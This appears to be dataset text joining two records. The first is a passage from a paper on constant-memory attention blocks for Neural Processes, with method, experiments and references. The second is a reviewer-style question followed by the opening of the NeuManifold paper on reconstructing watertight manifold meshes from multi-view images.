\rceil\) batches of input datapoins of size up to \(b_C\) (a pre-specified constant), i.e., \(D = \bigcup_{i=1}^{\lceil |D|/b_C \rceil} D_i\). Instead of computing the output at once, it is equivalent to performing an update \(\lceil |D|/b_C \rceil - 1\) times: \[ \text{CA}(L_B, D) = \text{UPDATE}(D_1, \text{UPDATE}(D_2, \ldots \text{UPDATE}(D_{\lceil |D|/b_C \rceil - 1}, \text{CA}(L_B, D_{\lceil |D|/b_C \rceil})))) \] Computing \(\text{CrossAttention}(L_B, D_{\lceil |D|/b_C \rceil})\) requires \(O(b_C|L_B|)\), i.e., constant memory since \(b_C\) and \(|L_B|\) are both constants. After its computation, the memory can be freed up, so that each of the subsequent UPDATE operations can re-use the memory space one by one. Each of the update operations also costs \(O(b_C|L_B|)\) constant memory, resulting in \(\text{CrossAttention}(L_B, D)\) only needing constant memory \(O(b_C|L_B|)\) in total. As a result, CMAB’s output can be computed in constant memory. ### 3.1.3 Additional Useful Properties Since CMABs leverage only cross-attention and self-attention modules where both are permutation invariant, CMABs are also permutation invariant by nature. Similar to transformers, CMABs can leverage positional encodings for sequence and temporal data. Another advantage of CMABs over prior attention works is that the original input data \(D\) does not need to be stored when performing updates, meaning the model has privacy-preserving properties and is applicable to streaming data settings where data cannot be stored. CMABs only require (1) constant memory regardless of the number of inputs, making them particularly useful for scaling to large amounts of inputs, and (2) constant computation to perform updates, making them particularly useful for settings where the data comes in a stream and updates need to be performed to the dataset (e.g., contextual bandits, bayesian optimization, active learning, and temporal data). The efficiency of CMABs allows for modern attention models to be highly accessible for low-compute domains (e.g., IoT devices). To showcase CMABs general applicability, we included in the Appendix a model for next-event prediction (Temporal Point Processes) that also leverages CMABs. ### 3.2 Constant Memory Attentive Neural Process (CMANP) In this section, we introduce Constant Memory Attentive Neural Processes (CMANPs), a memory efficient variant of Neural Processes (Figure 2) based on CMAB blocks. The conditioning, querying, and updating phases in CMANPs work as follows: **Conditioning Phase:** In the conditioning phase, the CMAB blocks encode the context dataset into a set of latent vectors \(L_i\). The first block takes as input a set of meta-learned latent vectors \(L_0\) (i.e., \(L_I\) in CMABs) and the context dataset \(D_C\), and outputs a set of encodings \(L_1\) (i.e., \(L'_I\) in CMABs). The output latents of each block are passed as the input latents to the next CMAB block. \[ L_i = \text{CMAB}(L_{i-1}, D_C) \] Since CMAB can compute its output in constant memory, CMANPs can also perform this conditioning phase in constant memory. Figure 2: Constant Memory Attentive Neural Processes. | In Terms of | Conditioning | Querying | Updating | |-------------|--------------|----------|----------| | TNP-D | N/A | X | N/A | | TNP-ND | N/A | X | N/A | | EQTNP | X | ✓ | X | | LBANP | ✓ | ✓ | ✓ | | LBANP-ND | ✓ | ✓ | ✓ | | CMANP (Ours)| ✓ | ✓ | ✓ | | CMANP-AND (Ours) | ✓ | ✓ | ✓ | Table 1: Comparison of Memory Complexities of top-performing Neural Processes with respect to the number of context datapoints \(|\mathcal{D}_C|\), number of target datapoints in a batch \(M\), and the number of new datapoints in an update \(|\mathcal{D}_U|\). (Green) Checkmarks represent requiring constant memory, (Orange) half checkmarks represent requiring linear memory, and (Red) Xs represent requiring quadratic or more memory. A larger table with all baselines is included in the Appendix. **Querying Phase:** In the querying phase, the deployed model retrieves information from the fixed size outputs of the CMAB blocks \((L_i)\) to make predictions for the query datapoints \((X_{query})\). Beginning with \(X^0_{query} \leftarrow X_{query}\), when making a prediction for the query datapoints \(X_{query}\), information is retrieved via cross-attention. \[ X^i_{query} = \text{CrossAttention}(X^{i-1}_{query}, L_i) \] **Update Phase:** In the update phase, the NP receives a batch of new datapoints \(\mathcal{D}_U\) to include in the context dataset. CMANPs leverage the efficient update mechanism of CMABs to achieve efficient updates (constant per datapoint) to its context dataset, i.e., computing updated latents \(L^{\text{updated}}_i\) given the new datapoints \(\mathcal{D}_U\). Beginning with \(L^0_{\text{updated}} \leftarrow L_0\), the CMAB blocks are updated sequentially using the updated output of the previous CMAB block as follows: \[ L^{\text{updated}}_i = \text{CMAB}(L^{\text{updated}}_{i-1}, \mathcal{D}_C \cup \mathcal{D}_U) \] Since CMAB can compute the output and perform updates in constant memory irrespective of the number of context datapoints, CMANPs can also compute its output and perform updates in constant memory. In Table 1, we compare the memory complexities of top-performing Neural Processes, showcasing the efficiency gains of CMANP over prior state-of-the-art methods. ### 3.2.1 Autoregressive Not-Diagonal Extension In many settings where NPs are applied such as Image Completion, the target datapoints are correlated and their predictive distribution are evaluated altogether. As such, prior works (Nguyen & Grover [2022], Feng et al. [2023]) have proposed a Not-Diagonal variant of NPs which predicts the mean and a full covariance matrix, typically via a low-rank approximation. This is in contrast to the vanilla (Diagonal) variants which predict the mean and a diagonal covariance matrix. Not-Diagonal methods, however, are not scalable, requiring quadratic memory in the number of target datapoints due to outputting a full covariance matrix. Leveraging the efficient updates property of CMABs, we propose CMANP-AND (Autoregressive Not-Diagonal). During training, CMANP-AND follows the framework of prior Not-Diagonal variants. When deployed, the model is treated as an autoregressive model that makes predictions in blocks of size $b_Q$ datapoints. For each block prediction, a mean and full covariance matrix is computed via a low-rank approximation. Sampled predictions of prior blocks are used to make predictions for later blocks. The first block is sampled as follows: $$\hat{y}_{N+1:N+b_Q} \sim \mathcal{N}(\mu_\theta(D^0_C, x_{N+1:N+b_Q}), \Sigma_\theta(D^0_C, x_{N+1:N+b_Q}))$$ Afterwards, by leveraging the efficient update mechanism, CMANP-AND performs an update using the predictions $\{(x_i, \hat{y}_i)\}_{N+1}^{N+b_Q}$ as new context datapoints, meaning that CMANP-AND is now conditioned on a new context dataset $D^1_C$ where $D^1_C = D^0_C \cup \{(x_i, \hat{y}_i)\}_{N+1}^{N+b_Q}$. Formally, the general formulation is as follows: $$\hat{y}_{N+kb_Q+1:N+(k+1)b_Q} \sim \mathcal{N}(\mu_\theta(D^k_C, x_{N+kb_Q+1:N+(k+1)b_Q}), \Sigma_\theta(D^k_C, x_{N+kb_Q+1:N+(k+1)b_Q}))$$ where $k$ is the number of blocks already processed and $D^k_C = \{(x_i, y_i)\}_{i=1}^{N} \cup \{(x_i, \hat{y}_i)\}_{N+1}^{N+kb_Q}$ is the context dataset. The hyperparameter $b_Q$ controls (1) the computational cost of the model in terms of memory and sequential computation length and (2) the performance of the model. Lower values of $b_Q$ allow for modelling more complex distributions, offering better performance but requiring more forward passes of the model. Since $b_Q$ is a constant, this Autoregressive Not-Diagonal extension makes predictions in constant memory, unlike prior Not-Diagonal variants which were quadratic in memory. As such, CMANP-AND can scale to a larger number of datapoints than prior methods (LBANP-ND and TNP-ND). The big-$O$ complexity analysis is included in the Appendix. 4 EXPERIMENTS In this section, we aim to evaluate the empirical performance of CMANPs and provide an analysis of CMANPs, showcasing their versatility. To do so, we compare CMANPs against a large variety of members of the Neural Process family on standard NP benchmarks: image completion and meta-regression. Specifically, we compare against Conditional Neural Processes (CNPs) (Garnelo et al., 2018a), Neural Processes (NPs) (Garnelo et al., 2018b), Bootstrapping Neural Processes (BNPs) (Lee et al., 2020), (Conditional) Attentive Neural Processes (C)ANPs (Kim et al., 2019), Bootstrapping Attentive Neural Processes (BANPs) (Lee et al., 2020), Latent Bottlenecked Attentive Neural Processes (LBANPs) (Feng et al., 2023), and Transformer Neural Processes (TNPs) (Nguyen & Grover, 2022). We also compare against the Not-Diagonal variants of the state-of-the-art methods (LBANP-ND and TNP-ND). Notably, our proposed CMANPs leverage CMABs, LBANPs (Feng et al., 2023) leverage iterative attention (Jaegle et al., 2021), and TNPs leverage transformers (Vaswani et al., 2017). For the purpose of consistency, we set the number of latents (i.e., bottleneck size) $|L_I| = |L_B| = 128$ across all experiments. We also set $b_Q = 5$. To fairly compare iterative attention and CMABs, we report results for LBANPs with the same sized bottleneck (i.e., number of latents $L = 128$) as CMANPs across all experiments. We later show in the analysis section (Section 4.2.1) that our reported performance of CMANPs can be further improved by increasing the number of latents ($|L_I|$ or $|L_B|$) and decreasing the prediction block size $b_Q$. Due to space limitations, several details are included in the appendix (1) experiments on contextual multi-armed bandits with a setting where data comes in a stream; (2) implementation details such as hyperparameters and their selection; and (3) an application of CMABs on Temporal Point Processes, showing CMABs’ general applicability. 4.1 IMAGE COMPLETION In this setting, we consider the image completion setting with two datasets: EMNIST (Cohen et al., 2017) and CelebA (Liu et al., 2015). The model is given a set of pixel values of an image and aims 2The code will be released upon acceptance. | Method | CelebA 32x32 | CelebA 64x64 | CelebA 128x128 | EMNIST Seen (0-9) | EMNIST Unseen (10-46) | |------------|--------------|--------------|----------------|-------------------|-----------------------| | CNP | 2.15 ± 0.01 | 2.43 ± 0.00 | 2.55 ± 0.02 | 0.73 ± 0.00 | 0.49 ± 0.01 | | CANP | 2.66 ± 0.01 | 3.15 ± 0.00 | — | 0.94 ± 0.01 | 0.82 ± 0.01 | | NP | 2.48 ± 0.02 | 2.60 ± 0.01 | 2.67 ± 0.01 | 0.79 ± 0.01 | 0.59 ± 0.01 | | ANP | 2.90 ± 0.00 | — | — | 0.98 ± 0.00 | 0.89 ± 0.00 | | BNP | 2.76 ± 0.01 | 2.97 ± 0.00 | — | 0.88 ± 0.01 | 0.73 ± 0.01 | | BANP | 3.09 ± 0.00 | — | — | 1.01 ± 0.00 | 0.94 ± 0.00 | | TNP-D | 3.89 ± 0.01 | 5.41 ± 0.01 | — | **1.46 ± 0.01** | **1.31 ± 0.00** | | LBANP | 3.97 ± 0.02 | 5.09 ± 0.02 | 5.84 ± 0.01 | 1.39 ± 0.01 | 1.17 ± 0.01 | | CMANP (Ours)| 3.93 ± 0.05 | 5.02 ± 0.14 | 5.55 ± 0.01 | 1.36 ± 0.01 | 1.09 ± 0.01 | | TNP-ND | 5.48 ± 0.02 | — | — | **1.50 ± 0.00** | **1.31 ± 0.00** | | LBANP-ND | 5.57 ± 0.03 | — | — | 1.42 ± 0.01 | 1.14 ± 0.01 | | CMANP-AND (Ours) | **6.31 ± 0.04** | **6.96 ± 0.07** | **7.15 ± 0.14** | **1.48 ± 0.03** | **1.19 ± 0.03** | Table 2: Image Completion Experiments. Each method is evaluated with 5 different seeds according to the log-likelihood (higher is better). The "dash" represents methods that could not be run because of the large memory requirement. to predict the remaining pixels of the image. Each image corresponds to a unique function \cite{Garnelo2018}. In this experiment, the \( x \) values are rescaled to \([-1, 1]\) and the \( y \) values are rescaled to \([-0.5, 0.5]\). For each task, a randomly selected set of pixels are selected as context datapoints and target datapoints. EMNIST comprises black and white images of handwritten letters of \( 32 \times 32 \) resolution. 10 classes are used for training. The context and target datapoints are sampled according to \( N \sim \mathcal{U}[3, 197] \) and \( M \sim \mathcal{U}[3, 200 - N] \) respectively. CelebA comprises coloured images of celebrity faces. Methods are evaluated on various resolutions to show the scalability of the methods. In CelebA32, images are downsampled to \( 32 \times 32 \) and the number of context and target datapoints are sampled according to \( N \sim \mathcal{U}[3, 197] \) and \( M \sim \mathcal{U}[3, 200 - N] \) respectively. In CelebA64, the images are down-sampled to \( 64 \times 64 \) and \( N \sim \mathcal{U}[3, 797] \) and \( M \sim \mathcal{U}[3, 800 - N] \). In CelebA128, the images are down-sampled to \( 128 \times 128 \) and \( N \sim \mathcal{U}[3, 1597] \) and \( M \sim \mathcal{U}[3, 1600 - N] \). Results. Although all NP baselines (see Table 2) were able to be evaluated on CelebA (32 x 32) and EMNIST, many were not able to scale to CelebA (64 x 64) and CelebA (128 x 128). All Not-Diagonal variants were not able to be trained on CelebA (64 x 64) and CelebA (128 x 128) due to being too computationally expensive and requiring quadratic computation and memory. In contrast, CMANP(-AND) was not affected by this limitation, showing empirically CMANP-AND is scalable to more datapoints than prior Not-Diagonal variants. The results show that CMANP-AND achieves clear state-of-the-art results on CelebA (32x32), CelebA (64x64), and CelebA (128x128). Furthermore, CMANP-AND achieves results competitive with state-of-the-art on EMNIST. Notably, the vanilla variants of CMANP (CMAB-based model) and LBANP (iterative attention-based model \cite{Jaegle2021}) achieve similar performance while having the same sized bottleneck, i.e., the number of latents in both baselines is 128. These results suggest that the improved efficiency properties (constant memory and constant computation updates) of CMABs come at little cost in performance compared to iterative attention. ### 4.2 1-D Regression In this experiment, the goal is to model an unknown function \( f \) and make predictions for a batch of \( M \) target datapoints given a batch of \( N \) context datapoints. During each training epoch, a batch of \( B = 16 \) functions are sampled from a GP prior with an RBF kernel \( f_i \sim GP(m, k) \) where \( m(x) = 0 \) and \( k(x, x') = \sigma_f^2 \exp\left(-\frac{(x-x')^2}{2l^2}\right) \). The hyperparameters are sampled according to \( l \sim \mathcal{U}[0.6, 1.0] \), \( \sigma_f \sim \mathcal{U}[0.1, 1.0] \), \( N \sim \mathcal{U}[3, 47] \), and \( M \sim \mathcal{U}[3, 50 - N] \). After training, the models are evaluated according to the log-likelihood of the targets on functions sampled from GPs with RBF and Matern 5/2 kernels. Results. As shown in Table 3, CMANP-AND outperforms all baselines (except for TNP-ND) by a significant margin. CMANP-AND achieves comparable results to TNP-ND while only requiring constant memory. Once again, we see that the vanilla version of CMANP (CMAB-based model) and LBANP (iterative attention-based model \cite{jaegle2021}) achieve similar performance, further suggesting that CMABs’ improves upon iterative attention in terms of efficiency (constant memory and constant computation updates) at little cost in performance. 4.2.1 Analysis Empirical Memory: Figure 3 compares the empirical memory cost of various state-of-the-art NP methods during evaluation. Comparing the vanilla variants of NPs, we see that TNP-D (transformer-based model) scales quadratically with respect to the number of context datapoints while LBANP (iterative attention-based model) scales linearly. In contrast, CMANP (CMAB-based model) only requires a low constant amount of memory regardless of the number of context datapoints. Comparing the Not-Diagonal variant of NPs, we see that both TNP-ND and LBANP-ND scale quadratically with respect to the number of target datapoints, limiting their applications. In contrast, CMANP-AND can scale to a far larger number of target datapoints. As a result, we can note that CMANPs are significantly more memory efficient and scalable to more datapoints than prior state-of-the-art methods. Effect of $b_Q$: Figure 4 compares performance with respect to varying query block sizes $b_Q$ for CMANP-AND. We see that smaller block sizes achieve significantly better performance. This is expected as the autoregressive nature of the Neural Process results in a more flexible predictive distribution and hence better performance at the cost of an increased time complexity. We provide an analysis of the time complexity in the appendix (Figures 6 and 7). Varying Number of Latents In Figure 4, we evaluated the result of varying the number of input latents ($L_I$) and the number of latents per block ($L_B$). We found that increasing the size of the bottleneck (i.e., number of latents $L_I$ and $L_B$) considerably improves the performance of the model. This, however, naturally comes at an increased memory cost. 5 Related Work Transformers \cite{vaswani2017} have achieved a large amount of success in a wide range of applications. However, the quadratic scaling of Transformers limits their applications. As such, there | Method | RBF | Matern 5/2 | |--------------|---------|------------| | CNP | 0.26 ± 0.02 | 0.04 ± 0.02 | | CANP | 0.79 ± 0.00 | 0.62 ± 0.00 | | NP | 0.27 ± 0.01 | 0.07 ± 0.01 | | ANP | 0.81 ± 0.00 | 0.63 ± 0.00 | | BNP | 0.38 ± 0.02 | 0.18 ± 0.02 | | BANP | 0.82 ± 0.01 | 0.66 ± 0.00 | | TNP-D | 1.39 ± 0.00 | 0.95 ± 0.01 | | LBANP | 1.27 ± 0.02 | 0.85 ± 0.02 | | CMANP (Ours) | 1.24 ± 0.01 | 0.80 ± 0.01 | | TNP-ND | 1.46 ± 0.00 | 1.02 ± 0.00 | | LBANP-ND | 1.24 ± 0.03 | 0.78 ± 0.02 | | CMANP-AND (Ours) | 1.48 ± 0.03 | 0.96 ± 0.01 | Table 3: 1-D Meta-Regression Experiments with log-likelihood metric (higher is better). Figure 4: (Left) CMANP’s performance relative to the size of the predictive block size ($b_Q$). (Middle) CMANP’s performance relative to the number of input latent vectors ($|L_I|$). (Right) CMANP’s performance relative to the number of block-wise latent vectors ($|L_B|$). have been many follow-up works on efficient variants. However, very few works have achieved constant memory complexity. To the best of our knowledge, we are aware of only two works which have achieved a constant memory complexity. Rabe & Staats (2022) showed that self-attention can be computed in constant memory at the expense of an overall quadratic computation. Wu et al. (2022) proposed Memformer, a constant memory version of transformer specifically for sequence modelling problems by leveraging an external dynamic memory to encode and decode information that is updated over timesteps. As such, the memory/latent state of Memformer changes depending on the order of the datapoints. In contrast, CMABs only require linear computation, constant memory, and are by default permutation-invariant, i.e., not limited to sequence modelling. For an in-depth overview of follow-up works to Transformers, we refer the reader to the recent survey works (Khan et al., 2022; Lin et al., 2022). Although CMABs have an efficient update mechanism reminiscent of RNNs (Cho et al., 2014; Chung et al., 2014; Hochreiter & Schmidhuber, 1997), their applications are different. RNNs are sensitive to input order, making their ideal setting applications which use sequential data. In contrast, by design, CMABs are by default permutation-invariant. Due to their long computation graph, RNNs also have issues such as vanishing gradients, making training these models with a large number of datapoints difficult. CMABs do not have issues with vanishing gradients since their ability to update efficiently is a fixed property of the module rather than RNN’s learned mechanism. NPs are applied in a wide range of applications which include Temporal Point Processes (Bae et al., 2023), sequence data (Singh et al., 2019; Willi et al., 2019), modelling stochastic physics fields (Holderrieth et al., 2021), robotics (Chen et al., 2022; Li et al., 2022b), and climate modeling (Vaughan et al., 2021). In doing so, there have been several methods proposed for encoding the context dataset. For example, CNPs (Garnelo et al., 2018a) encode the context set via a deep sets encoder (Zaheer et al., 2017), NPs (Garnelo et al., 2018b) propose to encode functional stochasticity via a latent variable. ConvCNPs (Gordon et al., 2019) use convolutions to build in translational equivariance. ANPs (Kim et al., 2019), LBANPs (Feng et al., 2023), and TNPs (Nguyen & Grover, 2022) use various kinds of attention. Recent work (Bruinsma et al., 2023) builds on CNPs and ConvCNPs by proposing to make them autoregressive at deployment. For an in-depth overview of NPs and their applications, we refer the reader to the recent survey work (Jha et al., 2022). 6 CONCLUSION In this work, we introduced CMAB (Constant Memory Attention Block), a novel general-purpose attention block that (1) is permutation invariant, (2) computes its output in constant memory, and (3) performs updates in constant computation. Building on CMAB, we proposed Constant Memory Attentive Neural Processes (CMANPs), a new NP variant requiring only constant memory. Leveraging the efficient updates property of CMAB, we introduced CMANP-AND (Autoregressive Not-Diagonal extension). Empirically, we show that CMANP(-AND) achieves state-of-the-art results, while being significantly more efficient than prior state-of-the-art methods. In our analysis, we also showed that either by increasing the size of the latent bottleneck ($L_I$ and $L_B$) or decreasing the block size ($b_Q$), we can further improve the model performance. REFERENCES Wonho Bae, Mohamed Osama Ahmed, Frederick Tung, and Gabriel L. Oliveira. Meta temporal point processes. In *International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=QZfdDpTXluM. Wessel Bruinsma, Stratis Markou, James Requeima, Andrew Y. K. Foong, Tom Andersson, Anna Vaughan, Anthony Buonomo, Scott Hosking, and Richard E Turner. Autoregressive conditional neural processes. In *The Eleventh International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=OAsXFPBfTBh. Ruijie Chen, Ning Gao, Ngo Anh Vien, Hanna Ziesche, and Gerhard Neumann. Meta-learning regrasping strategies for physical-agnostic objects. *arXiv preprint arXiv:2205.11110*, 2022. Kyunghyun Cho, Bart Van Merriënboer, Dzmitry Bahdanau, and Yoshua Bengio. On the properties of neural machine translation: Encoder-decoder approaches. *arXiv preprint arXiv:1409.1259*, 2014. Junyoung Chung, Caglar Gulcehre, KyungHyun Cho, and Yoshua Bengio. Empirical evaluation of gated recurrent neural networks on sequence modeling. *arXiv preprint arXiv:1412.3555*, 2014. Gregory Cohen, Saeed Afshar, Jonathan Tapson, and Andre Van Schaik. Emnist: Extending mnist to handwritten letters. In *2017 international joint conference on neural networks (IJCNN)*, pp. 2921–2926. IEEE, 2017. Leo Feng, Hossein Hajimirsadeghi, Yoshua Bengio, and Mohamed Osama Ahmed. Latent bottlenecked attentive neural processes. In *International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=yIxtevizEA. Andrew Foong, Wessel Bruinsma, Jonathan Gordon, Yann Dubois, James Requeima, and Richard Turner. Meta-learning stationary stochastic process prediction with convolutional neural processes. *Advances in Neural Information Processing Systems*, 33:8284–8295, 2020. Marta Garnelo, Dan Rosenbaum, Christopher Maddison, Tiago Ramalho, David Saxton, Murray Shanahan, Yee Whye Teh, Danilo Rezende, and SM Ali Eslami. Conditional neural processes. In *International Conference on Machine Learning*, pp. 1704–1713. PMLR, 2018a. Marta Garnelo, Jonathan Schwarz, Dan Rosenbaum, Fabio Viola, Danilo J Rezende, SM Eslami, and Yee Whye Teh. Neural processes. *arXiv preprint arXiv:1807.01622*, 2018b. Jonathan Gordon, Wessel P Bruinsma, Andrew YK Foong, James Requeima, Yann Dubois, and Richard E Turner. Convolutional conditional neural processes. In *International Conference on Learning Representations*, 2019. Sepp Hochreiter and Jürgen Schmidhuber. Long short-term memory. *Neural computation*, 9:1735–80, 12 1997. doi: 10.1162/neco.1997.9.8.1735. Peter Holderrieth, Michael J Hutchinson, and Yee Whye Teh. Equivariant learning of stochastic fields: Gaussian processes and steerable conditional neural processes. In *International Conference on Machine Learning*, pp. 4297–4307. PMLR, 2021. Andrew Jaegle, Felix Gimeno, Andy Brock, Oriol Vinyals, Andrew Zisserman, and Joao Carreira. Perceiver: General perception with iterative attention. In *International conference on machine learning*, pp. 4651–4664. PMLR, 2021. Saurav Jha, Dong Gong, Xuesong Wang, Richard E Turner, and Lina Yao. The neural process family: Survey, applications and perspectives. *arXiv preprint arXiv:2209.00517*, 2022. Salman Khan, Muzammal Naseer, Munawar Hayat, Syed Waqas Zamir, Fahad Shahbaz Khan, and Mubarak Shah. Transformers in vision: A survey. *ACM computing surveys (CSUR)*, 54(10s): 1–41, 2022. Hyunjik Kim, Andriy Mnih, Jonathan Schwarz, Marta Garnelo, Ali Eslami, Dan Rosenbaum, Oriol Vinyals, and Yee Whye Teh. Attentive neural processes. 2019.
f4HohsyNEk
SDF-based reconstruction methods (e.g. NeuS) claim that the raw density field is optimized only to satisfy the rendering objective (and is also biased away from the true surface), and therefore are not ideal for surface reconstruction. In this paper, you argue that this is unnecessary and that using the density field directly is a better choice. Could you elaborate on this choice?
NeuManifold: Neural Watertight Manifold Reconstruction with Efficient and High-Quality Rendering Support Anonymous authors Paper under double-blind review Abstract We present a method for generating high-quality watertight manifold meshes from multi-view input images. Existing volumetric rendering methods are robust in optimization but tend to generate noisy meshes with poor topology. Differentiable rasterization-based methods can generate high-quality meshes but are sensitive to initialization. Our method combines the benefits of both worlds; we take the geometry initialization obtained from neural volumetric fields, and further optimize the geometry as well as a compact neural texture representation with differentiable rasterizers. Through extensive experiments, we demonstrate that our method can generate accurate mesh reconstructions with faithful appearance that are comparable to previous volume rendering methods while being an order of magnitude faster in rendering. We also show that our generated mesh and neural texture reconstruction is compatible with existing graphics pipelines and enables downstream 3D applications such as simulation. Fig. 1. NeuManifold takes 2D images as input and generates watertight manifold meshes with neural textures. NeuManifold enables many downstream applications including high-quality novel-view synthesis and soft-body simulation. 1 Introduction Recent advancements in neural field representations (Mildenhall et al., 2021; Müller et al., 2022; Chen et al., 2023b) have enabled scene reconstructions with photorealistic rendering quality. However, they use volumetric representations, resulting in slow rendering and limited support for standard 3D pipelines like appearance editing, physical simulation, and geometry processing. For many such applications, meshes—especially those that are manifold and watertight—are the preferred option. Meshes can be rendered efficiently with standard 3D rendering engines and the watertight manifold property is often favorable in many geometry processing algorithms, such as mesh boolean operations, approximate convex decomposition (Wei et al., 2022), tetrahedralization (Hang, 2015) for simulation, and volumetric point sampling to initialize particle simulation. Although mesh reconstruction has been extensively studied in prior arts (Schönberger et al., 2016; Snavely et al., 2006; Furukawa & Ponce, 2010), reconstructing a high-quality mesh with realistic rendering remains a highly challenging task. To address this, recent advancements in inverse graphics through differentiable surface rendering have shown great promise, such as nvdiffrec (Munkberg et al., 2021) and nerf2mesh (Tang et al., 2022). Nevertheless, the rendering quality of these methods... still lags behind that of neural field-based methods, and their meshes are only optimized for rendering applications, resulting in non-manifold models with self-intersections that are unsuitable for simulation and other geometry processing applications. Our objective is to bridge this gap by reconstructing high-quality meshes, that facilitate fast rendering and are broadly supported for 3D applications beyond rendering, while preserving the superior visual quality of volumetric approaches. To accomplish this, we introduce NeuManifold, a novel neural approach that can produce a high-quality, watertight manifold mesh of a 3D scene with neural textures. As depicted in Fig. 1, our technique achieves photo-realistic rendering quality. More significantly, our mesh-based model can be employed directly in physical simulation engines that frequently require watertight and even manifold meshes. We achieve this by integrating advanced neural field rendering with differentiable rasterization-based mesh reconstruction techniques. We observe that volumetric neural field rendering and differentiable rasterization have mutually complementary benefits. While neural field-based approaches like TensoRF (Chen et al., 2022a) can produce high visual quality and generate density fields as scene geometry, the exported meshes, when rendered using surface rendering (rasterization), cannot retain the original high visual quality achieved with volume rendering. In contrast, differentiable mesh rasterization techniques such as nvdiffrec (Munkberg et al., 2021) directly optimize the final mesh output using rendering supervision. Yet, they are sensitive to geometry initialization and can get stuck in local minima, especially when reconstructing high-resolution meshes. (see Fig. 5). Therefore, we propose leveraging neural field reconstruction techniques to create high-quality initializations for differentiable rasterization, significantly enhancing the final mesh reconstruction quality. Additionally, we have observed that the non-linearity of the density field can lead to undesirable artifacts when using previously prevalent differentiable marching algorithms (Shen et al., 2021), as illustrated in Fig. 3. To address this issue, we introduce Differentiable Marching Cubes (DiffMC), which effectively eliminates these artifacts and results in significantly smoother surfaces. Furthermore, we enhance the visual quality of our model by modeling appearance using neural textures instead of the traditional BRDF textures utilized in most inverse rendering methods (Munkberg et al., 2021; Luan et al., 2021). Specifically, we use TensoRF (Chen et al., 2022a) to compactly factorize a 3D neural field into axis-aligned orthogonal 2D and 1D neural textures. While TensoRF uses volume rendering, we extract features from these neural textures at surface points on a mesh and decode view-dependent colors for surface rendering in differentiable rasterization. We demonstrate that our factorized neural textures produce superior rendering quality compared to other texture representations, including iNGP-base hash grid and MLPs (see Table 4). Our work offers the following key contributions: • We propose NeuManifold, which excels at producing high-quality watertight manifold meshes. These meshes support not only realistic rendering but also applications in a diverse array of physical simulations and geometry processing tasks. • We introduce the first complete Differentiable Marching Cubes (DiffMC) implementation utilizing CUDA, delivering smooth surfaces from density fields. It runs around $10 \times$ faster than the previous prevalent mesh extraction algorithm (DMTet) at similar triangle counts. • Furthermore, our mesh-based representation can be seamlessly integrated with GLSL shaders, enabling real-time rendering applications. 2 RELATED WORK Neural field representations. Neural rendering methods have demonstrated photo-realistic scene reconstruction and rendering quality. In particular, NeRF (Mildenhall et al., 2021) introduced the neural radiance field representation and achieved remarkable visual quality with volume rendering techniques. Various neural field representations have been proposed for better efficiency and quality, including MipNeRF (Barron et al., 2021) and RefNeRF (Verbin et al., 2022) that are based on coordinate-based MLPs, TensoRF (Chen et al., 2022a) and DiF (Chen et al., 2023a) that leverage tensor factorization, iNGP (Müller et al., 2022) that introduces multi-scale hashing, Plenoxels (Fridovich-Keil et al., 2022) and DVGO (Sun et al., 2022) that are voxel-based, and Point-NeRF (Xu et al., 2022) that is based on neural point clouds. Fig. 2. Overall training pipeline for Stage 1 and 2 of NeuManifold. In Stage 1, volumetric rendering pipelines are used to initialize geometry and appearance networks. In Stage 2, the initialized geometry and appearance networks are further trained in differentiable rasterization with the help of DiffMC. The generated watertight manifold mesh and optimized appearance network are used in deployment. However, most neural field representations represent 3D geometry as a volume density field, which is hard to edit for 3D applications other than rendering. While several methods have enabled appearance editing or shape deformation for such neural fields (Xiang et al., 2021; Zhang et al., 2022a; Yuan et al., 2022; Wu et al., 2022; Kuang et al., 2022; Chong Bao and Bangbang Yang et al., 2022), it is still highly challenging to apply them directly in modern 3D engines. Recent methods have proposed replacing density fields with volume SDFs to achieve better surface reconstruction with volume rendering (Wang et al., 2021; 2022; Yaniv et al., 2021; Oechsle et al., 2021). However, neither density- or SDF-based models can be easily exported as meshes without significantly losing their rendering quality. Another recent work MobileNeRF (Chen et al., 2022b) converts the neural field into a triangle soup for real-time rendering. However, their mesh does not model accurate scene geometry and thus cannot be used for downstream applications. Our work offers a general solution to convert volumetric neural field representations to high-quality manifold meshes, enabling both high-quality rendering and broad additional 3D applications like physical simulation. Mesh reconstruction and rendering. Polygonal meshes are a staple in modern 3D engines, widely employed for modeling, simulation, and rendering. Previous research has extensively explored mesh reconstruction from multi-view captured images through photogrammetry systems (Pollefeys & Gool, 2002; Snavely et al., 2006; Schönberger et al., 2016) like structure from motion (Schönberger & Frahm, 2016; Tang & Tan, 2019; Vijayanarasimhan et al., 2017), multi-view stereo (Furukawa & Ponce, 2010; Kutulakos & Seitz, 2000; Schönberger et al., 2016; Yao et al., 2018; Cheng et al., 2020), and surface extraction techniques (Lorensen & Cline, 1987; Kazhdan et al., 2006). However, achieving photorealistic rendering with classical photogrammetry pipelines remains a formidable challenge. On the other hand, inverse rendering aims to fully disentangle intrinsic scene properties from captured images (Goldman et al., 2009; Hernandez et al., 2008; Zhang et al., 2021b; Bi et al., 2020b; c; a; Zhang et al., 2021a; Li et al., 2018; Zhang et al., 2022b). Recent methods, such as nvdiffrec (Munkberg et al., 2021), nerf2mesh (Tang et al., 2022), BakedSDF (Yariv et al., 2023), achieve high-quality reconstruction and fast rendering speed. Nevertheless, these methods often introduce self-intersections or an excessive number of triangles in the mesh reconstruction, which are undesired for simulation and geometry processing tasks. Moreover, in recent years, several studies (Liao et al., 2018; Remelli et al., 2020; Shen et al., 2021; Mehta et al., 2022; Shen et al., 2023) have delved into differentiable mesh extraction algorithms due to their crucial role in mesh optimization workflows, connecting implicit field and explicit mesh representations. While they still have limitations, such as surface artifacts (Shen et al., 2021) and a lack of manifold guarantees (Liao et al., 2018; Shen et al., 2023). Our DiffMC generates significantly smoother surfaces on density fields and maintains watertight manifold properties. In summary, our approach leverages neural field reconstruction to provide a high-quality initialization for differentiable rendering, and we integrate it with differentiable marching cubes to ensure that our final output is manifold and watertight. This enables our model to be directly applied to a wide range of 3D applications. 3 METHOD We present a 3D reconstruction pipeline that reconstructs scene geometry and appearance from captured multi-view images. Our method consists of two main stages: initialization with differentiable volume rendering and manifold generation with differentiable rasterization, as illustrated in Fig. 2 plus an optional fine-tuning stage. In particular, we leverage neural field representations with volume rendering-based reconstruction to offer the initialization for the subsequent mesh optimization, where we further optimize the topology, geometry and appearance 